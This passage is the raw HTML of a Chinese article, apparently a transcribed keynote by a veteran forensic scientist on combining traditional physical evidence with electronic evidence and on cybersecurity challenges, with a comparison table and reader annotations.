Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">适用案例</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">入室盗窃、单一凶杀案</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">连环案件、复杂金融犯罪</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">局限性</span></p></td><td width="197" valign="top" style="width:147.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">难以解释无直接接触的情况</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">可能需要大量数据支持</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">技术要求</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">显微镜、化学分析等</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">数据分析、行为分析等</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">证据链建立</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">直接、线性</span></p></td><td width="189" valign="top" style="width:132.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">复杂、网状</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">对调查的指导</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">指向特定嫌疑人或物品</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">提供更广泛的调查方向</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">在法庭上的应用</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">直观、容易理解</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">可能需要更多专家解释</span></p></td></tr><tr><td width="139" valign="top" style="width:103.9pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">与其他学科的结合</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">主要与化学、生物学结合</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">结合心理学、统计学等</span></p></td></tr><tr><td width="139" valign="top" style="width:102.55pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">发展趋势</span></p></td><td width="197" valign="top" style="width:146.5pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">向更精细的分析方向发展</span></p></td><td width="189" valign="top" style="width:134.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">向更全面的整合分析发展</span></p></td></tr></tbody></table><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">这个表格概括了两种理论的主要特点和区别。值得注意的是，在实际的刑事调查中，这两种理论常常是互补使用的，而不是相互排斥的。现代鉴识科学倾向于综合运用这两种理论，以获得更全面、更可靠的证据分析结果。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000693" data-ratio="0.7505376344086021" data-type="png" data-w="465" height="232.0" width="310.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=03ec1f41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAFYRic28X3hnNfoydXGMdCnIDjmyRiaaVsa6NFljf8qZwLlgiaK7nBxTyw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">traditional crime scene传统的现场就是一个地方，一个死者，我们在现场能找到物证。电脑的现场可能是那个系统，可能是手机。所以 21 世纪我们要将传统的现场，跟电脑的现场结合起来找物证，是传统物证和电子物证结合。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000695" data-ratio="0.7565217391304347" data-type="png" data-w="460" height="232.0" width="306.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ff09c20d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oA2boibBJjtUQXLA8zW3SgDoiatWXRT4h4Q3giaKic726YFSguk1EKicz2I4w%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">e-evidence 就是电脑的设计，电脑的里边的content，它的 hard drive，它的software，各种。traditional，就是包括指纹，dna，实物证据。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000694" data-ratio="0.3950749464668094" data-type="png" data-w="934" height="160.66998291015625" width="408.6700439453125" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=af50c14b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oA2heLjyYMItc7jB0lzKf24WXbXgIm9fibLgaclqmOq1FmRRYfiaTke3OQ%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">那怎么结合呢？很多的物证能够找到很多资料。今年春天我们举行了一个会议，怎么样找这个物证啊？关于怎么样子在手机、Email 、multiple data source 、 deep fake investigation。当时很多的参加的人要求以后每年举行一次，大家分享新的进展。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000696" data-ratio="0.6641074856046065" data-type="png" data-w="521" height="230.0" width="347.3399963378906" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=274c3e51&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAH23lgNwNOmhAboooKwI67QJ35jmlfZJ1RFeCcRDgTgdvOkT19vGUrw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">怎样发现信息？</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000697" data-ratio="0.7602591792656588" data-type="png" data-w="463" height="234.0" width="308.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=347ca042&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAgaatww9Yej1zNGpsgXPbgibiajmDCiawASudfPfYGlU3sFuxFVd5I5tbw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">信息来源有：现场、证人、物证、大数据库、社会大众提供的资料跟调查机关的intelligence；然后去 collect 收集这些information；然后经过这个资料分析， data analytics，然后找出一些证据。传统的现场我们要观察现场，e-现场同样的要观察，好像 paper上面的指纹，留下来的 DNA 这些。</span></section><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】此图和FDF 2019稍有区别，先识别，有个系统全面性，不遗漏来源；再收集，可以避免浪费时间在不相关的信息上，或者制定最佳收集计划</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">新兴物证科学和网络安全结合</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000699" data-ratio="0.746268656716418" data-type="png" data-w="469" height="232.66998291015625" width="312.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=47a91c59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oA6gqZtH1U1QywzA9b0lm7aozlfyBKxbrrGDJfXAMYjxAGDo5hJekJnA%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">因为 21 世纪物证科学有很多新的进展，所以我们怎么样给物证科学跟网络安全结合起来？这是一个很大的挑战，因为这个 data collection、 intelligence analytics 变成越来越重要。这些不但可以保护网络安全，而且能够证明犯罪的事实。</span></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">Make the impossible possible</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">我从事鉴识科学已经 64 年了，调查过很多现场，在实验室工作了很久，也到法院出证，也讲学。这么多年，很多人说我一生。Make the impossible possible.</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">包括很多案件，也出版了很多的书籍，也得过很多的荣誉，也参加过各种的讲席会。从来这是 60 多年来，我没有感觉到像今天我们世界面临的问题，面临的挑战这么多。疫情、全球的暖化，污染，全世界水灾、地震、野火、战争、经济衰退，但是更大的问题就是网络的安全。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">刚才我也讲过，这网络安全不只是影响到国家、工业的安全，而且对个人，尤其是年轻人、老年人网络安全变成一个很大很大的挑战。在这个复杂的环境里边，我们怎么样能保护互联网的安全？我很高兴听到国内的同行召集这个 2022 年的第十届会议，讨论互联网安全，希望这个大会成功，也祝大家能够共同努力。</span></section><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000701" data-ratio="0.7521739130434782" data-type="png" data-w="460" height="230.0" width="306.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=256c8af4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAPLTAG3uKMxicqppWicRgtP7OkknvactPeo6aR8sfZLfjC0scpNyf990Q%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">who are we going to trust？</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">因为将来未来的社会，未来的国家都建筑在互联网安全上面， who are we going to trust？这互联网的一些信息我们到底能相信多少？我们个人跟企业的隐私怎么样保护，这些资料怎么使社会大众觉得他们可以安全地上网。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000698" data-ratio="0.7467811158798283" data-type="png" data-w="466" height="232.0" width="310.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c507d7ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAsrqSv9MsHprBaibAhmibx77DtyuFjtHAhtrdibt4mDoXqRwj6reVNUZ9w%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">另外当然从我们鉴证科学的角识来看，我们</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">怎么样能够合法的、安全的运用这些资料协助破案</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，所以希望这个大会国内的同行能够发现一个方法。</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">怎么样 navigate 未来的世界</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，未来的网络，我们怎么样能保护国家个人的安全？</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">最后，我要谢谢大会的邀请，也祝各位身体健康，家庭幸福，谢谢。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】navigate，导航需要建立坐标体系，这个坐标体系是数字化的底层核心技术，也是未来降低软件复杂度、研发管理复杂度的一个法门</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 